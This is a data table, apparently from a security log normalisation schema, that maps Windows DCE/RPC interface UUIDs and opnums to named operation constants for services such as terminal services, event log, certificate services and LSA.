3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:5 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_FALLBACK_PARAMS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:6 XDM_CONST.DCERPC_OPERATION_RPC_SRV_FALLBACK_REFRESH_PARAMS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:7 XDM_CONST.DCERPC_OPERATION_RPC_SRV_STATIC_REFRESH_PARAMS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:8 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REMOVE_DNS_REGISTRATIONS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:9 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REQUEST_PARAMS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:10 XDM_CONST.DCERPC_OPERATION_RPC_SRV_PERSISTENT_REQUEST_PARAMS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:11 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REGISTER_PARAMS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:12 XDM_CONST.DCERPC_OPERATION_RPC_SRV_DE_REGISTER_PARAMS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:13 XDM_CONST.DCERPC_OPERATION_RPC_SRV_ENUM_INTERFACES

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:14 XDM_CONST.DCERPC_OPERATION_RPC_SRV_QUERY_LEASE_INFO

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:15 XDM_CONST.DCERPC_OPERATION_RPC_SRV_SET_CLASS_ID
 Original Mapped Description

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:16 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_CLASS_ID

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:17 XDM_CONST.DCERPC_OPERATION_RPC_SRV_SET_CLIENT_ID

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:18 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_CLIENT_ID

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:19 XDM_CONST.DCERPC_OPERATION_RPC_SRV_NOTIFY_MEDIA_RECONNECTED

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:20 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_ORIGINAL_SUBNET_MASK

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:21 XDM_CONST.DCERPC_OPERATION_RPC_SRV_SET_MSFT_VENDOR_SPECIFIC_OPTIONS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:22 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REQUEST_CACHED_PARAMS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:23 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REGISTER_CONNECTION_STATE_NOTIFICATION

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:24 XDM_CONST.DCERPC_OPERATION_RPC_SRV_DE_REGISTER_CONNECTION_STATE_NOTIFICATION

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:25 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_NOTIFICATION_STATUS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:26 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_DHCP_SERVICED_CONNECTIONS

2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:0 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_OPEN_SERVER

2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:1 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_CLOSE_SERVER

2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:2 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_LOAD_POLICY

2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:3 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_UNLOAD_POLICY

2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:4 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_SET_POLICY

2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:5 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_GET_AVAILABLE_POLICY_IDS

2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:6 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_GET_POLICY

2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:7 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_GET_POLICY_INFORMATION

2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:8 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_DEACTIVATE_CURRENT_POLICY

5ca4a760-ebb1-11cf-8611-00a0245420ed:0 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_OPEN_SERVER

5ca4a760-ebb1-11cf-8611-00a0245420ed:1 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CLOSE_SERVER

5ca4a760-ebb1-11cf-8611-00a0245420ed:2 XDM_CONST.DCERPC_OPERATION_RPC_ICA_SERVER_PING

5ca4a760-ebb1-11cf-8611-00a0245420ed:3 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ENUMERATE

5ca4a760-ebb1-11cf-8611-00a0245420ed:4 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_RENAME

5ca4a760-ebb1-11cf-8611-00a0245420ed:5 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_QUERY_INFORMATION

5ca4a760-ebb1-11cf-8611-00a0245420ed:6 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SET_INFORMATION

5ca4a760-ebb1-11cf-8611-00a0245420ed:7 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SEND_MESSAGE

5ca4a760-ebb1-11cf-8611-00a0245420ed:8 XDM_CONST.DCERPC_OPERATION_RPC_LOGON_ID_FROM_WIN_STATION_NAME

5ca4a760-ebb1-11cf-8611-00a0245420ed:9 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NAME_FROM_LOGON_ID

5ca4a760-ebb1-11cf-8611-00a0245420ed:10 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CONNECT

5ca4a760-ebb1-11cf-8611-00a0245420ed:11 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_VIRTUAL_OPEN

5ca4a760-ebb1-11cf-8611-00a0245420ed:12 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_BEEP_OPEN

5ca4a760-ebb1-11cf-8611-00a0245420ed:13 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_DISCONNECT

5ca4a760-ebb1-11cf-8611-00a0245420ed:14 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_RESET

5ca4a760-ebb1-11cf-8611-00a0245420ed:15 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SHUTDOWN_SYSTEM

5ca4a760-ebb1-11cf-8611-00a0245420ed:16 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_WAIT_SYSTEM_EVENT

5ca4a760-ebb1-11cf-8611-00a0245420ed:17 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SHADOW

5ca4a760-ebb1-11cf-8611-00a0245420ed:18 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SHADOW_TARGET_SETUP

5ca4a760-ebb1-11cf-8611-00a0245420ed:19 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SHADOW_TARGET

5ca4a760-ebb1-11cf-8611-00a0245420ed:20 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GENERATE_LICENSE
 Original Mapped Description

5ca4a760-ebb1-11cf-8611-00a0245420ed:21 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_INSTALL_LICENSE

5ca4a760-ebb1-11cf-8611-00a0245420ed:22 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ENUMERATE_LICENSES

5ca4a760-ebb1-11cf-8611-00a0245420ed:23 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ACTIVATE_LICENSE

5ca4a760-ebb1-11cf-8611-00a0245420ed:24 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_REMOVE_LICENSE

5ca4a760-ebb1-11cf-8611-00a0245420ed:25 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_QUERY_LICENSE

5ca4a760-ebb1-11cf-8611-00a0245420ed:26 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SET_POOL_COUNT

5ca4a760-ebb1-11cf-8611-00a0245420ed:27 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_QUERY_UPDATE_REQUIRED

5ca4a760-ebb1-11cf-8611-00a0245420ed:28 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CALLBACK

5ca4a760-ebb1-11cf-8611-00a0245420ed:29 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_APPLICATION_INFO

5ca4a760-ebb1-11cf-8611-00a0245420ed:30 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_READ_REGISTRY

5ca4a760-ebb1-11cf-8611-00a0245420ed:31 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_WAIT_FOR_CONNECT

5ca4a760-ebb1-11cf-8611-00a0245420ed:32 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NOTIFY_LOGON

5ca4a760-ebb1-11cf-8611-00a0245420ed:33 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NOTIFY_LOGOFF

5ca4a760-ebb1-11cf-8611-00a0245420ed:34 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ENUMERATE_PROCESSES

5ca4a760-ebb1-11cf-8611-00a0245420ed:35 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ANNOYANCE_POPUP

5ca4a760-ebb1-11cf-8611-00a0245420ed:36 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ENUMERATE_PROCESSES

5ca4a760-ebb1-11cf-8611-00a0245420ed:37 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_TERMINATE_PROCESS

5ca4a760-ebb1-11cf-8611-00a0245420ed:38 XDM_CONST.DCERPC_OPERATION_RPC_SERVER_NW_LOGON_SET_ADMIN

5ca4a760-ebb1-11cf-8611-00a0245420ed:39 XDM_CONST.DCERPC_OPERATION_RPC_SERVER_NW_LOGON_QUERY_ADMIN

5ca4a760-ebb1-11cf-8611-00a0245420ed:40 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NTSD_DEBUG

5ca4a760-ebb1-11cf-8611-00a0245420ed:41 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_BREAK_POINT

5ca4a760-ebb1-11cf-8611-00a0245420ed:42 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CHECK_FOR_APPLICATION_NAME

5ca4a760-ebb1-11cf-8611-00a0245420ed:43 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_ALL_PROCESSES

5ca4a760-ebb1-11cf-8611-00a0245420ed:44 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_PROCESS_SID

5ca4a760-ebb1-11cf-8611-00a0245420ed:45 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_TERM_SRV_COUNTERS_VALUE

5ca4a760-ebb1-11cf-8611-00a0245420ed:46 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_RE_INITIALIZE_SECURITY

5ca4a760-ebb1-11cf-8611-00a0245420ed:47 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_BROADCAST_SYSTEM_MESSAGE

5ca4a760-ebb1-11cf-8611-00a0245420ed:48 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SEND_WINDOW_MESSAGE

5ca4a760-ebb1-11cf-8611-00a0245420ed:49 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NOTIFY_NEW_SESSION

5ca4a760-ebb1-11cf-8611-00a0245420ed:50 XDM_CONST.DCERPC_OPERATION_RPC_SERVER_GET_INTERNET_CONNECTOR_STATUS

5ca4a760-ebb1-11cf-8611-00a0245420ed:51 XDM_CONST.DCERPC_OPERATION_RPC_SERVER_SET_INTERNET_CONNECTOR_STATUS

5ca4a760-ebb1-11cf-8611-00a0245420ed:52 XDM_CONST.DCERPC_OPERATION_RPC_SERVER_QUERY_INET_CONNECTOR_INFORMATION

5ca4a760-ebb1-11cf-8611-00a0245420ed:53 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_LAN_ADAPTER_NAME

5ca4a760-ebb1-11cf-8611-00a0245420ed:54 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_UPDATE_USER_CONFIG

5ca4a760-ebb1-11cf-8611-00a0245420ed:55 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_QUERY_LOGON_CREDENTIALS

5ca4a760-ebb1-11cf-8611-00a0245420ed:56 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_REGISTER_CONSOLE_NOTIFICATION

5ca4a760-ebb1-11cf-8611-00a0245420ed:57 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_UN_REGISTER_CONSOLE_NOTIFICATION

5ca4a760-ebb1-11cf-8611-00a0245420ed:58 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_UPDATE_SETTINGS

5ca4a760-ebb1-11cf-8611-00a0245420ed:59 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SHADOW_STOP

5ca4a760-ebb1-11cf-8611-00a0245420ed:60 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CLOSE_SERVER_EX

5ca4a760-ebb1-11cf-8611-00a0245420ed:61 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_IS_HELP_ASSISTANT_SESSION
 Original Mapped Description

5ca4a760-ebb1-11cf-8611-00a0245420ed:62 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_MACHINE_POLICY

5ca4a760-ebb1-11cf-8611-00a0245420ed:63 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_UPDATE_CLIENT_CACHED_CREDENTIALS

5ca4a760-ebb1-11cf-8611-00a0245420ed:64 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_FUS_CAN_REMOTE_USER_DISCONNECT

5ca4a760-ebb1-11cf-8611-00a0245420ed:65 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CHECK_LOOP_BACK

5ca4a760-ebb1-11cf-8611-00a0245420ed:66 XDM_CONST.DCERPC_OPERATION_RPC_CONNECT_CALLBACK

5ca4a760-ebb1-11cf-8611-00a0245420ed:67 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NOTIFY_DISCONNECT_PIPE

5ca4a760-ebb1-11cf-8611-00a0245420ed:68 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SESSION_INITIALIZED

5ca4a760-ebb1-11cf-8611-00a0245420ed:69 XDM_CONST.DCERPC_OPERATION_RPC_REMOTE_ASSISTANCE_PREPARE_SYSTEM_RESTORE

5ca4a760-ebb1-11cf-8611-00a0245420ed:70 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_ALL_PROCESSES_NT6

5ca4a760-ebb1-11cf-8611-00a0245420ed:71 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_REGISTER_NOTIFICATION_EVENT

5ca4a760-ebb1-11cf-8611-00a0245420ed:72 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_UN_REGISTER_NOTIFICATION_EVENT

5ca4a760-ebb1-11cf-8611-00a0245420ed:73 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_AUTO_RECONNECT

5ca4a760-ebb1-11cf-8611-00a0245420ed:74 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CHECK_ACCESS

5ca4a760-ebb1-11cf-8611-00a0245420ed:75 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_OPEN_SESSION_DIRECTORY

d6d70ef0-0e3b-11cb-acc3-08002b1d29c3:0 XDM_CONST.DCERPC_OPERATION_NSIBINDINGEXPORT

d6d70ef0-0e3b-11cb-acc3-08002b1d29c3:1 XDM_CONST.DCERPC_OPERATION_NSIBINDINGUNEXPORT

d3fbb514-0e3b-11cb-8fad-08002b1d29c3:0 XDM_CONST.DCERPC_OPERATION_NSIBINDINGLOOKUPBEGIN

d3fbb514-0e3b-11cb-8fad-08002b1d29c3:1 XDM_CONST.DCERPC_OPERATION_NSIBINDINGLOOKUPDONE

d3fbb514-0e3b-11cb-8fad-08002b1d29c3:2 XDM_CONST.DCERPC_OPERATION_NSIBINDINGLOOKUPNEXT

d3fbb514-0e3b-11cb-8fad-08002b1d29c3:3 XDM_CONST.DCERPC_OPERATION_NSIMGMTHANDLESETEXPAGE

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:0 XDM_CONST.DCERPC_OPERATION_NSIGROUPDELETE

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:1 XDM_CONST.DCERPC_OPERATION_NSIGROUPMBRADD

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:2 XDM_CONST.DCERPC_OPERATION_NSIGROUPMBRREMOVE

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:3 XDM_CONST.DCERPC_OPERATION_NSIGROUPMBRINQBEGIN

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:4 XDM_CONST.DCERPC_OPERATION_NSIGROUPMBRINQNEXT

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:5 XDM_CONST.DCERPC_OPERATION_NSIGROUPMBRINQDONE

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:6 XDM_CONST.DCERPC_OPERATION_NSIPROFILEDELETE

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:7 XDM_CONST.DCERPC_OPERATION_NSIPROFILEELTADD

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:8 XDM_CONST.DCERPC_OPERATION_NSIPROFILEELTREMOVE

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:9 XDM_CONST.DCERPC_OPERATION_NSIPROFILEELTINQBEGIN

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:10 XDM_CONST.DCERPC_OPERATION_NSIPROFILEELTINQNEXT

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:11 XDM_CONST.DCERPC_OPERATION_NSIPROFILEELTINQDONE

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:12 XDM_CONST.DCERPC_OPERATION_NSIENTRYOBJECTINQBEGIN

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:13 XDM_CONST.DCERPC_OPERATION_NSIENTRYOBJECTINQNEXT

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:14 XDM_CONST.DCERPC_OPERATION_NSIENTRYOBJECTINQDONE

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:15 XDM_CONST.DCERPC_OPERATION_NSIENTRYEXPANDNAME

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:16 XDM_CONST.DCERPC_OPERATION_NSIMGMTBINDINGUNEXPORT

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:17 XDM_CONST.DCERPC_OPERATION_NSIMGMTENTRYDELETE

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:18 XDM_CONST.DCERPC_OPERATION_NSIMGMTENTRYCREATE

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:19 XDM_CONST.DCERPC_OPERATION_NSIMGMTENTRYINQIFIDS

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:20 XDM_CONST.DCERPC_OPERATION_NSIMGMTINQEXPAGE
 Original Mapped Description

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:21 XDM_CONST.DCERPC_OPERATION_NSIMGMTINQSETAGE

82273fdc-e32a-18c3-3f78-827929dc23ea:0 XDM_CONST.DCERPC_OPERATION_ELFR_CLEAR_ELFW

82273fdc-e32a-18c3-3f78-827929dc23ea:1 XDM_CONST.DCERPC_OPERATION_ELFR_BACKUP_ELFW

82273fdc-e32a-18c3-3f78-827929dc23ea:2 XDM_CONST.DCERPC_OPERATION_ELFR_CLOSE_EL

82273fdc-e32a-18c3-3f78-827929dc23ea:3 XDM_CONST.DCERPC_OPERATION_ELFR_DEREGISTER_EVENT_SOURCE

82273fdc-e32a-18c3-3f78-827929dc23ea:4 XDM_CONST.DCERPC_OPERATION_ELFR_NUMBER_OF_RECORDS

82273fdc-e32a-18c3-3f78-827929dc23ea:5 XDM_CONST.DCERPC_OPERATION_ELFR_OLDEST_RECORD

82273fdc-e32a-18c3-3f78-827929dc23ea:6 XDM_CONST.DCERPC_OPERATION_ELFR_CHANGE_NOTIFY

82273fdc-e32a-18c3-3f78-827929dc23ea:7 XDM_CONST.DCERPC_OPERATION_ELFR_OPEN_ELW

82273fdc-e32a-18c3-3f78-827929dc23ea:8 XDM_CONST.DCERPC_OPERATION_ELFR_REGISTER_EVENT_SOURCE_W

82273fdc-e32a-18c3-3f78-827929dc23ea:9 XDM_CONST.DCERPC_OPERATION_ELFR_OPEN_BELW

82273fdc-e32a-18c3-3f78-827929dc23ea:10 XDM_CONST.DCERPC_OPERATION_ELFR_READ_ELW

82273fdc-e32a-18c3-3f78-827929dc23ea:11 XDM_CONST.DCERPC_OPERATION_ELFR_REPORT_EVENT_W

82273fdc-e32a-18c3-3f78-827929dc23ea:12 XDM_CONST.DCERPC_OPERATION_ELFR_CLEAR_ELFA

82273fdc-e32a-18c3-3f78-827929dc23ea:13 XDM_CONST.DCERPC_OPERATION_ELFR_BACKUP_ELFA

82273fdc-e32a-18c3-3f78-827929dc23ea:14 XDM_CONST.DCERPC_OPERATION_ELFR_OPEN_ELA

82273fdc-e32a-18c3-3f78-827929dc23ea:15 XDM_CONST.DCERPC_OPERATION_ELFR_REGISTER_EVENT_SOURCE_A

82273fdc-e32a-18c3-3f78-827929dc23ea:16 XDM_CONST.DCERPC_OPERATION_ELFR_OPEN_BELA

82273fdc-e32a-18c3-3f78-827929dc23ea:17 XDM_CONST.DCERPC_OPERATION_ELFR_READ_ELA

82273fdc-e32a-18c3-3f78-827929dc23ea:18 XDM_CONST.DCERPC_OPERATION_ELFR_REPORT_EVENT_A

82273fdc-e32a-18c3-3f78-827929dc23ea:19 XDM_CONST.DCERPC_OPERATION_ELFR_REGISTER_CLUSTER_SVC

82273fdc-e32a-18c3-3f78-827929dc23ea:20 XDM_CONST.DCERPC_OPERATION_ELFR_DEREGISTER_CLUSTER_SVC

82273fdc-e32a-18c3-3f78-827929dc23ea:21 XDM_CONST.DCERPC_OPERATION_ELFR_WRITE_CLUSTER_EVENTS

82273fdc-e32a-18c3-3f78-827929dc23ea:22 XDM_CONST.DCERPC_OPERATION_ELFR_GET_LOG_INFORMATION

82273fdc-e32a-18c3-3f78-827929dc23ea:23 XDM_CONST.DCERPC_OPERATION_ELFR_FLUSH_EL

82273fdc-e32a-18c3-3f78-827929dc23ea:24 XDM_CONST.DCERPC_OPERATION_ELFR_REPORT_EVENT_AND_SOURCE_W

12b81e99-f207-4a4c-85d3-77b42f76fd14:0 XDM_CONST.DCERPC_OPERATION_SECL_CREATE_PROCESS_WITH_LOGON_W

12b81e99-f207-4a4c-85d3-77b42f76fd14:1 XDM_CONST.DCERPC_OPERATION_SECL_CREATE_PROCESS_WITH_LOGON_EX_W

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:0 XDM_CONST.DCERPC_OPERATION_KEYR_OPEN_KEY_SERVICE

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:1 XDM_CONST.DCERPC_OPERATION_KEYR_ENUMERATE_PROVIDERS

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:2 XDM_CONST.DCERPC_OPERATION_KEYR_ENUMERATE_PROVIDER_TYPES

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:3 XDM_CONST.DCERPC_OPERATION_KEYR_ENUMERATE_PROV_CONTAINERS

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:4 XDM_CONST.DCERPC_OPERATION_KEYR_CLOSE_KEY_SERVICE

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:5 XDM_CONST.DCERPC_OPERATION_KEYR_GET_DEFAULT_PROVIDER

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:6 XDM_CONST.DCERPC_OPERATION_KEYR_SET_DEFAULT_PROVIDER

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:7 XDM_CONST.DCERPC_OPERATION_KEYR_ENROLL

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:8 XDM_CONST.DCERPC_OPERATION_KEYR_EXPORT_CERT

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:9 XDM_CONST.DCERPC_OPERATION_KEYR_IMPORT_CERT

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:10 XDM_CONST.DCERPC_OPERATION_KEYR_ENUMERATE_AVAILABLE_CERT_TYPES

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:11 XDM_CONST.DCERPC_OPERATION_KEYR_ENUMERATE_C_AS

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:12 XDM_CONST.DCERPC_OPERATION_KEYR_ENROLL_V2
 Original Mapped Description

8d0ffe72-d252-11d0-bf8f-00c04fd9126b:13 XDM_CONST.DCERPC_OPERATION_KEYR_QUERY_REQUEST_STATUS

68b58241-c259-4f03-a2e5-a2651dcbc930:0 XDM_CONST.DCERPC_OPERATION_K_SR_SUBMIT_REQUEST

68b58241-c259-4f03-a2e5-a2651dcbc930:1 XDM_CONST.DCERPC_OPERATION_K_SR_GET_TEMPLATES

68b58241-c259-4f03-a2e5-a2651dcbc930:2 XDM_CONST.DCERPC_OPERATION_K_SR_GET_C_AS

0d72a7d4-6148-11d1-b4aa-00c04fb66ea0:0 XDM_CONST.DCERPC_OPERATION_SS_CERT_PROTECT_FUNCTION

f50aac00-c7f3-428e-a022-a6b71bfb9d43:0 XDM_CONST.DCERPC_OPERATION_SS_CAT_DB_ADD_CATALOG

f50aac00-c7f3-428e-a022-a6b71bfb9d43:1 XDM_CONST.DCERPC_OPERATION_SS_CAT_DB_DELETE_CATALOG

f50aac00-c7f3-428e-a022-a6b71bfb9d43:2 XDM_CONST.DCERPC_OPERATION_SS_CAT_DB_ENUM_CATALOGS

f50aac00-c7f3-428e-a022-a6b71bfb9d43:3 XDM_CONST.DCERPC_OPERATION_SS_CAT_DB_REGISTER_FOR_CHANGE_NOTIFICATION

f50aac00-c7f3-428e-a022-a6b71bfb9d43:4 XDM_CONST.DCERPC_OPERATION_KEYR_CLOSE_KEY_SERVICE

f50aac00-c7f3-428e-a022-a6b71bfb9d43:5 XDM_CONST.DCERPC_OPERATION_SS_CAT_DB_REBUILD_DATABASE

12345778-1234-abcd-ef00-0123456789ab:0 XDM_CONST.DCERPC_OPERATION_LSAR_CLOSE

12345778-1234-abcd-ef00-0123456789ab:1 XDM_CONST.DCERPC_OPERATION_LSAR_DELETE

12345778-1234-abcd-ef00-0123456789ab:2 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_PRIVILEGES

12345778-1234-abcd-ef00-0123456789ab:3 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_SECURITY_OBJECT

12345778-1234-abcd-ef00-0123456789ab:4 XDM_CONST.DCERPC_OPERATION_LSAR_SET_SECURITY_OBJECT

12345778-1234-abcd-ef00-0123456789ab:5 XDM_CONST.DCERPC_OPERATION_LSAR_CHANGE_PASSWORD

12345778-1234-abcd-ef00-0123456789ab:6 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_POLICY

12345778-1234-abcd-ef00-0123456789ab:7 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_INFORMATION_POLICY

12345778-1234-abcd-ef00-0123456789ab:8 XDM_CONST.DCERPC_OPERATION_LSAR_SET_INFORMATION_POLICY

12345778-1234-abcd-ef00-0123456789ab:9 XDM_CONST.DCERPC_OPERATION_LSAR_CLEAR_AUDIT_LOG

12345778-1234-abcd-ef00-0123456789ab:10 XDM_CONST.DCERPC_OPERATION_LSAR_CREATE_ACCOUNT

12345778-1234-abcd-ef00-0123456789ab:11 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_ACCOUNTS

12345778-1234-abcd-ef00-0123456789ab:12 XDM_CONST.DCERPC_OPERATION_LSAR_CREATE_TRUSTED_DOMAIN

12345778-1234-abcd-ef00-0123456789ab:13 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_TRUSTED_DOMAINS

12345778-1234-abcd-ef00-0123456789ab:14 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_NAMES

12345778-1234-abcd-ef00-0123456789ab:15 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_SIDS

12345778-1234-abcd-ef00-0123456789ab:16 XDM_CONST.DCERPC_OPERATION_LSAR_CREATE_SECRET

12345778-1234-abcd-ef00-0123456789ab:17 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_ACCOUNT

12345778-1234-abcd-ef00-0123456789ab:18 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_PRIVILEGES_ACCOUNT

12345778-1234-abcd-ef00-0123456789ab:19 XDM_CONST.DCERPC_OPERATION_LSAR_ADD_PRIVILEGES_TO_ACCOUNT

12345778-1234-abcd-ef00-0123456789ab:20 XDM_CONST.DCERPC_OPERATION_LSAR_REMOVE_PRIVILEGES_FROM_ACCOUNT

